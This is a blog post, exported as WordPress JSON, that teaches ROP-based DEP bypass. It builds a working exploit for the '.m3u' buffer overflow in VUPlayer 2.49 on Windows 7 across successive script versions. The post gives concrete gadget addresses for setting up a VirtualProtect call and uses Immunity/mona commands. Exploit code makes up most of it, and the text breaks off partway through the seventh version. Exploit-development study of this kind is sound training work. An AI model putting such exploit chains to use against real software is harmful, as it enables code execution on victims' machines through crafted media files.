{"id":168,"date":"2022-01-24T21:24:07","date_gmt":"2022-01-24T20:24:07","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=168"},"modified":"2022-01-24T21:24:49","modified_gmt":"2022-01-24T20:24:49","slug":"rop-gadgets-virtualprotect","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2022\/01\/24\/rop-gadgets-virtualprotect\/","title":{"rendered":"ROP Gadgets: VirtualProtect()"},"content":{"rendered":"\n<p>We&#8217;ll work on&nbsp;VUPlayer 2.49 (Windows 7) &#8211; &#8216;.m3u&#8217; Local Buffer Overflow (DEP Bypass) for this article<\/p>\n\n\n\n<h3>Initial exploit v1: EIP Control<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><code>import sys<br>import struct<br>import os\u00a0<br><br>crash_file\u00a0= \"test.m3u\"\u00a0fuzz\u00a0= \"A\" * 1012<br>fuzz += \"B\" * 4<br>fuzz += \"C\" * (3000 - len(fuzz))\u00a0<br><br>file= open(crash_file, \"w\")<br>file.write(fuzz)<br>file.close()<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Start the app and attach to Immunity<\/p>\n\n\n\n<p>Drag the m3u file on the app and see the EIP filled with 42424242<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"627\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-1024x627.png\" alt=\"\" class=\"wp-image-174\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-1024x627.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-300x184.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-768x471.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-1536x941.png 1536w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-2048x1255.png 2048w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-5-1568x961.png 1568w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Look for modules with ASLR disabled: !mona modules<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"538\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-1024x538.png\" alt=\"\" class=\"wp-image-172\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-1024x538.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-300x158.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-768x404.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-1536x807.png 1536w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-2048x1076.png 2048w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-3-1568x824.png 1568w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>We&#8217;ll choose one of the address:&nbsp;0x10101008<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"111\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1024x111.png\" alt=\"\" class=\"wp-image-169\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1024x111.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-300x33.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-768x84.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1536x167.png 1536w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1568x171.png 1568w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image.png 1746w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>The EIP points to RETN&nbsp;<\/p>\n\n\n\n<p>Set a breakpoint at&nbsp;0x10101008 and reproduce the m3u file with the following script<\/p>\n\n\n\n<h3>The exploit v2<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><code>import sys<br>import struct<br>import os\u00a0<br><br>crash_file\u00a0= \"vuplayer-dep.m3u\"\u00a0<br><br>fuzz\u00a0= \"A\" * 1012<br>fuzz += \"\\x08\\x10\\x10\\x10\" * 4<br>fuzz += \"C\" * (3000 - len(fuzz))\u00a0<br><br>file= open(crash_file, \"w\")<br>file.write(fuzz)<br>file.close()<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>We hit the breakpoint at the EIP RETN address<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"168\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1-1024x168.png\" alt=\"\" class=\"wp-image-170\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1-1024x168.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1-300x49.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1-768x126.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1-1536x253.png 1536w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1-1568x258.png 1568w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-1.png 1666w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3>API Calls<\/h3>\n\n\n\n<p>To determine what API call pointers we have access to that we can use to disable DEP\u00a0, type the following command: <code>!mona ropfunc.\u00a0<\/code><\/p>\n\n\n\n<p>Check out the results on ropfunc.txt.<\/p>\n\n\n\n<p>We&#8217;ll use VirtualProtect API call as it seems available in the results<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"642\" height=\"296\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-4.png\" alt=\"\" class=\"wp-image-173\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-4.png 642w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-4-300x138.png 300w\" sizes=\"(max-width: 642px) 100vw, 642px\" \/><\/figure>\n\n\n\n<h3>VirtualProtect Function<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>BOOL WINAPI VirtualProtect(\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=>\u00a0\u00a0\u00a0\u00a0A pointer to VirtualProtect()<br>\u00a0\u00a0_In_\u00a0\u00a0\u00a0LPVOID lpAddress,\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=>\u00a0\u00a0\u00a0\u00a0Return Address<br>\u00a0\u00a0_In_\u00a0\u00a0\u00a0SIZE_T dwSize,\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=>\u00a0\u00a0\u00a0\u00a0dwSize  (0x201)<br>\u00a0\u00a0_In_\u00a0\u00a0\u00a0DWORD flNewProtect,\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=>\u00a0\u00a0\u00a0\u00a0flNewProtect (0x40)<br>\u00a0\u00a0_Out_\u00a0\u00a0PDWORD lpflOldProtect\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=>\u00a0\u00a0\u00a0\u00a0A writable pointer<br>);<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>* since we are working with the Stack, we&#8217;ll put the parameters in reverse order<\/p>\n\n\n\n<h3>The plan:<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td># EAX 90909090 =&gt; Nop&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br># ECX &lt;writeable pointer&gt; =&gt; lpflOldProtect&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br># EDX 00000040 =&gt; flNewProtect&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br># EBX 00000201 =&gt; dwSize&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br># ESP ???????? =&gt; Leave as is&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br># EBP ???????? =&gt; Call to ESP (jmp, call, push,..)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br># ESI ???????? =&gt; PTR to VirtualProtect &#8211; DWORD PTR of 0x1060E25C<br># EDI 10101008 =&gt; ROP-Nop same as EIP<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3>EAX<\/h3>\n\n\n\n<p>First, start creating the rop.txt and rop_suggestions.txt files with the following command:&nbsp;<\/p>\n\n\n\n<p><code>!mona rop -m \"basswma,bassmidi,bass<\/code><\/p>\n\n\n\n<div class=\"is-layout-flow wp-block-group\"><div class=\"wp-block-group__inner-container\">\n<ul><li>for EAX, we need to put 90909090.\u00a0<\/li><li>put that value on stack\u00a0<\/li><li>then pop eax<\/li><\/ul>\n<\/div><\/div>\n\n\n\n<p>In rop_suggestions.txt file, we search for pop eax and there is a section<\/p>\n\n\n\n<p>We&#8217;ll select the simplest one:&nbsp;0x10015fe7<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"139\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-2-1024x139.png\" alt=\"\" class=\"wp-image-171\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-2-1024x139.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-2-300x41.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-2-768x104.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-2.png 1426w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3>The exploit v3<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;.<br># EAX Chunk Affects: EAX<br>eax = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7) # pntr to # POP EAX # RETN<br>eax += struct.pack(&#8216;&lt;L&#8217;, 0x90909090)<br>rop = eax\u00a0<br><br>fuzz = &#8220;A&#8221; * 1012<br>fuzz += &#8220;\\x08\\x10\\x10\\x10&#8221; # 10101008\u00a0\u00a0&lt;&#8211; Pointer to a RETN<br>fuzz += rop<br>fuzz += &#8220;C&#8221; * (3000 &#8211; len(fuzz))<br><br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Let&#8217;s create the file and check if EAX is filled with 90909090 to verify<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"850\" height=\"566\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-6.png\" alt=\"\" class=\"wp-image-175\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-6.png 850w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-6-300x200.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-6-768x511.png 768w\" sizes=\"(max-width: 850px) 100vw, 850px\" \/><\/figure>\n\n\n\n<h3>ECX<\/h3>\n\n\n\n<p><strong><em># ECX &lt;writeable pointer&gt; =&gt; lpflOldProtect<\/em><\/strong><\/p>\n\n\n\n<p>For the writable location, first go to modules on Immunity. Choose one of the DLLs for RWE written next to<\/p>\n\n\n\n<p>10101000 BASSWMA seems RWE<\/p>\n\n\n\n<p>Double click and look for a writable location with 0000 :&nbsp;<strong>101053DC<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"309\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-7-1024x309.png\" alt=\"\" class=\"wp-image-176\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-7-1024x309.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-7-300x90.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-7-768x232.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-7.png 1386w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Then look for a POP ECX location in the rop_suggestions.txt file: 0x10601007<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"186\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-8-1024x186.png\" alt=\"\" class=\"wp-image-177\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-8-1024x186.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-8-300x55.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-8-768x140.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-8.png 1308w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3>The exploit v4<\/h3>\n\n\n\n<div class=\"is-layout-flow wp-block-group\"><div class=\"wp-block-group__inner-container\">\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;.<br><br># EAX Chunk Affects: EAX<br>eax = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7) # pointer to # POP EAX # RETN<br>eax += struct.pack(&#8216;&lt;L&#8217;, 0x90909090)\u00a0<br><br># ECX Chunk Affects: ECX<br>ecx = struct.pack(&#8216;&lt;L&#8217;, 0x10601007) # pntr to # POP ECX # RETN<br>ecx += struct.pack(&#8216;&lt;L&#8217;, 0x101053DC)\u00a0\u00a0\u00a0\u00a0# a writable pointer\u00a0<br><br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n<\/div><\/div>\n\n\n\n<h3>EDX<\/h3>\n\n\n\n<p><strong><em># EDX 00000040 =&gt; flNewProtect<\/em><\/strong><\/p>\n\n\n\n<p>we don&#8217;t have a direct value to put 0x40 into EDX according to ROP results. So we need to be creative:<\/p>\n\n\n\n<ul><li>Zero out EAX:&nbsp;# XOR EAX,EAX # RETN&nbsp;&nbsp;(0x106074f8)<\/li><li>add 4 to EAX until it reaches&nbsp;0x40: 16 times # ADD EAX,4 # RETN (0x10014474)<\/li><li>swap values between EAX and EDX so that EDX holds our goal value: # XCHG EAX,EDX # RETN&nbsp;(0x10038a6c)<\/li><\/ul>\n\n\n\n<h3>The exploit v5<\/h3>\n\n\n\n<div class=\"is-layout-flow wp-block-group\"><div class=\"wp-block-group__inner-container\">\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;.<br><br># EAX Chunk Affects: EAX<br>eax = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7) # pointer to # POP EAX # RETN<br>eax += struct.pack(&#8216;&lt;L&#8217;, 0x90909090)\u00a0<br><br># ECX Chunk Affects: ECX<br>ecx = struct.pack(&#8216;&lt;L&#8217;, 0x10601007) # pntr to # POP ECX # RETN<br>ecx += struct.pack(&#8216;&lt;L&#8217;, 0x101053DC)\u00a0\u00a0\u00a0\u00a0# a writable pointer\u00a0<br><br># EDX Chunk Affects: EAX, EDX<br>edx = struct.pack(&#8216;&lt;L&#8217;, 0x106074f8)\u00a0\u00a0\u00a0\u00a0 # XOR EAX,EAX # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0# ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10038a6c)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EDX # RETN\u00a0<br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n<\/div><\/div>\n\n\n\n<h3>EBX<\/h3>\n\n\n\n<p><strong><em># EBX 00000201 =&gt; dwSize&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/em><\/strong><\/p>\n\n\n\n<p>We couldnt find a way to do it directly on EBX so I&#8217;ll check for EAX again<\/p>\n\n\n\n<p>First I look for a way to # XCHG EAX, EBX # RETN (0x10032f32)<\/p>\n\n\n\n<p>We found a gadget to XOR a static value<\/p>\n\n\n\n<p>remember:<\/p>\n\n\n\n<div class=\"is-layout-flow wp-block-group\"><div class=\"wp-block-group__inner-container\">\n<div class=\"is-layout-flow wp-block-group\"><div class=\"wp-block-group__inner-container\">\n<div class=\"is-layout-flow wp-block-group\"><div class=\"wp-block-group__inner-container\">\n<ul><li>a XOR b = c<\/li><li>b XOR c = a<\/li><li>c XOR a = b<\/li><\/ul>\n<\/div><\/div>\n<\/div><\/div>\n<\/div><\/div>\n\n\n\n<p>So if we do the math:<\/p>\n\n\n\n<ul><li><strong><em>0x201 XOR 994803BD = 994801bc (in hexadecimal)<\/em><\/strong><\/li><li><strong><em>994801bc XOR 994803BD = 0x201<\/em><\/strong><\/li><\/ul>\n\n\n\n<p>Online Calculator:&nbsp;<a href=\"https:\/\/miniwebtool.com\/bitwise-calculator\/?data_type=16&amp;number1=994803bd&amp;number2=00000201&amp;operator=XOR\">here<\/a><\/p>\n\n\n\n<p>So our plan is:&nbsp;<\/p>\n\n\n\n<ul><li>POP\u00a00x994801bc\u00a0into EAX<\/li><li>XOR with the static value: 994803BD\u00a0<\/li><li>swap the values EAX and EBX<\/li><\/ul>\n\n\n\n<h3>The exploit v6<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;.<br><br># EAX Chunk Affects: EAX<br>eax = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7) # pointer to # POP EAX # RETN<br>eax += struct.pack(&#8216;&lt;L&#8217;, 0x90909090)\u00a0<br><br># ECX Chunk Affects: ECX<br>ecx = struct.pack(&#8216;&lt;L&#8217;, 0x10601007) # pntr to # POP ECX # RETN<br>ecx += struct.pack(&#8216;&lt;L&#8217;, 0x101053DC)\u00a0\u00a0\u00a0\u00a0# a writable pointer\u00a0<br><br># EDX Chunk Affects: EAX, EDX<br>edx = struct.pack(&#8216;&lt;L&#8217;, 0x106074f8)\u00a0\u00a0\u00a0\u00a0 # XOR EAX,EAX # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0# ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10038a6c)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EDX # RETN\u00a0<br><br># EBX Chunk Affects: EAX, EBX<br>ebx = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7)     #POP EAX # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x994801bc)\u00a0\u00a0\u00a0\u00a0# once XOR&#8217;d w the static value 994803BD, this will result in 0x201<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x1003a074)\u00a0\u00a0\u00a0\u00a0#XOR EAX,994803BD # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x10032f32)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EBX # RETN 0x00<br><br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3>EBP<\/h3>\n\n\n\n<p><strong><em># EBP ???????? =&gt; Call to ESP (jmp, call, push,..)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/em><\/strong><\/p>\n\n\n\n<p>For EBP, we need to point to a JMP ESP<\/p>\n\n\n\n<p>Found a JMP ESP on 1010539F with the following command:\u00a0<\/p>\n\n\n\n<p><strong>!mona find\u00a0-s &#8216;\\xff\\xe4&#8217;\u00a0\u00a0-m &#8220;basswma,bassmidi,bass<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"89\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-1024x89.png\" alt=\"\" class=\"wp-image-178\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-1024x89.png 1024w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-300x26.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-768x67.png 768w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-1536x133.png 1536w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-2048x178.png 2048w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-9-1568x136.png 1568w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Now we need a gadget to pop it into EBP<\/p>\n\n\n\n<p>I found&nbsp;# POP EBP # RETN 0x04 (0x10017c0d). We can use this but we need to compensate for RETN 0x4 as it&#8217;s not a regular RETN gadget<\/p>\n\n\n\n<p>We can achieve this by RETN gadgets (ROP NOPs) as filler.&nbsp;&nbsp;(10101008)<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"576\" height=\"46\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-10.png\" alt=\"\" class=\"wp-image-179\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-10.png 576w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-10-300x24.png 300w\" sizes=\"(max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<h3>The exploit v7<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;.<br><br># EAX Chunk Affects: EAX<br>eax = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7) # pointer to # POP EAX # RETN<br>eax += struct.pack(&#8216;&lt;L&#8217;, 0x90909090)\u00a0<br><br># ECX Chunk Affects: ECX<br>ecx = struct.pack(&#8216;&lt;L&#8217;, 0x10601007) # pntr to # POP ECX # RETN<br>ecx += struct.pack(&#8216;&lt;L&#8217;, 0x101053DC)\u00a0\u00a0\u00a0\u00a0# a writable pointer\u00a0<br><br># EDX Chunk Affects: EAX, EDX<br>edx = struct.pack(&#8216;&lt;L&#8217;, 0x106074f8)\u00a0\u00a0\u00a0\u00a0 # XOR EAX,EAX # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 